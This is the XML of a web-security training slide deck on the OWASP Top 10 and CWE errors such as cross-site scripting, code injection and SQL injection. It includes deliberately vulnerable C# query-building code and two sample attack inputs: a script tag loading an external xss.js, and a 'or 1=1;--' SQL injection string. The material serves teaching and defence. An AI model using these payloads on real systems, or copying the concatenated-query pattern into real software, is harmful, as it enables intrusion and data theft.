              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>AntiXss.HtmlEncode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Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>AntiXss.HtmlEncode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ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>AntiXss.HtmlEncode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Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>Server.HtmlEncode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Request.Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(Session[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>Server.HtmlEncode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ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]));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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(“data from db”));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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9144000" cy="141763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C# ASP.NET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149868"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Top 25 Programming Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="2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Description of the error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="2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Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="2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Protection ( Best Practice to avoid the error) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="2" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="2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Hands - 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What to Expect?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C5C1B6-3C88-43F4-B45F-F5CA8AD6B85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>
          <a:xfrm>
            <a:off x="0" y="1481138"/>
            <a:ext cx="9144000" cy="5194316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Most prevalent, dangerous vulnerability in web application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Attackers insert JavaScript or other browser executable content into the web page that your application generates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Users click on malicious content as if it is generated by the web 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CWE-79: Failure to Preserve Web Page Structure (aka 'Cross-site Scripting')</a:t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E7C479-BBE6-4A5D-BB7D-CDE167DD1A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271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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored Cross-Site Scripting Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6553200" y="1600200"/>
            <a:ext cx="236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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application with stored XSS vulnerability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311400" y="3765550"/>
            <a:ext cx="35052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Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5816600" y="2568575"/>
            <a:ext cx="1066800" cy="733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" name="Picture 23" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:lum bright="24000" contrast="42000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016000" y="1622425"/>
            <a:ext cx="1093788" cy="1268413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="107763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0726" name="Oval 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5867400"/>
            <a:ext cx="471488" cy="373063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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30727" name="Oval 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="3440113"/>
            <a:ext cx="471488" cy="373062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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30728" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5816600" y="3902075"/>
            <a:ext cx="1066800" cy="801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9" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2159000" y="1038225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4163" indent="-2841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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker sets the trap – update my profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30730" name="Pictur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311400" y="1366838"/>
            <a:ext cx="35052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Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="1828800"/>
            <a:ext cx="2438400" cy="14779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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker enters a malicious script into a web page that stores the data on the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30732" name="Oval 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="1150938"/>
            <a:ext cx="471488" cy="373062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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30733" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2151063" y="3438525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4163" indent="-2841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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victim views page – sees attacker profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30734" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1371600" y="5915025"/>
            <a:ext cx="6324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4163" indent="-2841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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Script silently sends attacker Victim’s session cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30735" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3225800" y="4038600"/>
            <a:ext cx="2438400" cy="14779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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Script runs inside victim’s browser with full access to the DOM and cookies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883400" y="2968625"/>
            <a:ext cx="1455738" cy="1412875"/>
            <a:chOff x="4336" y="1870"/>
            <a:chExt cx="917" cy="890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30742" name="Rectangle 38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Custom Code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30743" name="Rectangle 39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Accounts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30744" name="Rectangle 40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Finance</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30745" name="Rectangle 41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Administration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30746" name="Rectangle 42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Transactions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30747" name="Rectangle 43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Communication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30748" name="Rectangle 44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Knowledge Mgmt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30749" name="Rectangle 45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E-Commerce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30750" name="Rectangle 46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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Bus. Functions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 52" descr="businesswom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6000" y="4037013"/>
            <a:ext cx="1050925" cy="1255712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="107763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0738" name="Freeform 53"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2535238"/>
            <a:ext cx="2768600" cy="3235325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2768600 w 1744"/>
              <a:gd name="T1" fmla="*/ 2368124 h 2328"/>
              <a:gd name="T2" fmla="*/ 1549400 w 1744"/>
              <a:gd name="T3" fmla="*/ 3035202 h 2328"/>
              <a:gd name="T4" fmla="*/ 254000 w 1744"/>
              <a:gd name="T5" fmla="*/ 3035202 h 2328"/>
              <a:gd name="T6" fmla="*/ 25400 w 1744"/>
              <a:gd name="T7" fmla="*/ 1834463 h 2328"/>
              <a:gd name="T8" fmla="*/ 101600 w 1744"/>
              <a:gd name="T9" fmla="*/ 300185 h 2328"/>
              <a:gd name="T10" fmla="*/ 558800 w 1744"/>
              <a:gd name="T11" fmla="*/ 33354 h 23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44"/>
              <a:gd name="T19" fmla="*/ 0 h 2328"/>
              <a:gd name="T20" fmla="*/ 1744 w 1744"/>
              <a:gd name="T21" fmla="*/ 2328 h 23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44" h="2328">
                <a:moveTo>
                  <a:pt x="1744" y="1704"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1492" y="1904"/>
                  <a:pt x="1240" y="2104"/>
                  <a:pt x="976" y="2184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="712" y="2264"/>
                  <a:pt x="320" y="2328"/>
                  <a:pt x="160" y="2184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2040"/>
                  <a:pt x="32" y="1648"/>
                  <a:pt x="16" y="1320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="992"/>
                  <a:pt x="8" y="432"/>
                  <a:pt x="64" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="0"/>
                  <a:pt x="236" y="12"/>
                  <a:pt x="352" y="24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0739" name="TextBox 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="6240463"/>
            <a:ext cx="5969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F6600"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>www.aspectsecurity.com/documents/Aspect_OWASP_Top_10_Part_1.ppt - Similar pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30740" name="Slide Number Placeholder 3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FE3C25-4639-4A16-A888-A7E1E52D27E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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30741" name="Footer Placeholder 3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>
          <a:xfrm>
            <a:off x="-1" y="1214422"/>
            <a:ext cx="9144001" cy="4792678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Input Validation is the first step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Again sanitization of input at both client and server sides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HTML Coding of all input when put into output pages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CWE-79: Failure to Preserve Web Page Structure (aka 'Cross-site Scripting') - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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B05E6E-CA67-42C9-9B1C-F0CB9DF8584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94316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Code Injection is a term used when code is injected straight into a program/script from an outside source for execution at some point in time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These type of vulnerabilities may be many times worse than any other vulnerability, since the security of the website, and possibly of the server, is compromised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buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-94: Failure to Control Generation of Code (aka 'Code Injection')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1F079A-3D3B-4C1F-824F-AC3B0925FC9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071546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C#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ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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xfrm>
            <a:off x="0" y="1071547"/>
            <a:ext cx="9144000" cy="5165742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = “INSERT INTO Users (Username) VALUES ( ‘” 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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’)”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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What if: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pP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9431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There is a very simple solution to the problem  and that is to check the variable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Another solution is to check for invalid characters and setup all the page files in a separate directory, all together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CWE-94: Failure to Control Generation of Code (aka 'Code Injection') - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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44E148-D9C6-4047-A761-61715C18787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Content Placeholder 1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122878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Security measures are implemented at client side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Trusting the client side security is not enough how best they are implemented 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JavaScript can be disabled in browsers to over come input validation at client side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CWE-602: Client-Side Enforcement of Server-Side Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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8CCBFA-7741-4D64-84BE-BFCEE9C9D3A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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1481138"/>
            <a:ext cx="9144000" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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Any security measures implemented at client side must be duplicated at the server side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CWE-602: Client-Side Enforcement of Server-Side Security - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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1BD151-4FAF-41A7-B4CE-7D4591843C7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265754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400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-95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Injection flaws, particularly SQL injection, are common in web 	applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-95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Injection occurs when user-supplied data is sent to an 	interpreter as part of a command or query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-95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The attacker’s hostile data tricks the interpreter into 	executing unintended commands or changing 	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A2.	Injection Flaws </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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C7E4D3E-5E40-4D83-895D-4F7542835B3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1142984"/>
            <a:ext cx="9013825" cy="52657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Some common types of command injection flaws are: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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> SQL injection (malicious calls to backend databases via SQL), using shell commands to run external programs.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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Using system calls in turn to make calls to the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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Any Web application that relies on the use of an interpreter has 	the   potential to fall victim to this type of flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" sz="2400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A2.	Injection Flaws </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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2BE666-B558-4533-9AA1-34D62AA73F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What is Web Application Security ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto"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Why is it important ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto"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OWASP Top 10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Description of the vulnerability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Example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Solution ( Best Practice to avoid the vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="4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Top 25 Programming Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Description of the error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Solution ( Best Practice to avoid the error) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="2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Hands - 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1741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EF63E8-74D9-4442-AC7E-9FB54AE26A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8893175" cy="1071546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C#ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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5165742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone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Arial" charset="0"/>
              </a:rPr>
              <a:t>// Reading data from input text field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string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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string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Product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“Product”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/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" charset="0"/>
              </a:rPr>
              <a:t>	//Dynamically creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> statements with user supplied data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string query1 = “SELECT * FROM Users WHERE Username = ‘” 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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Passsword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = ‘” 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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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string query2 = “SELECT * FROM Products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ProdName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> like ‘” 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Product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>+ “’”;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9144000" cy="128586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C#ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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xfrm>
            <a:off x="-1" y="1071546"/>
            <a:ext cx="9144000" cy="5165742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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What if attacker entered: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	whatever’ or 1=1;-- in </a:t>
            </a:r>
            <a:r>
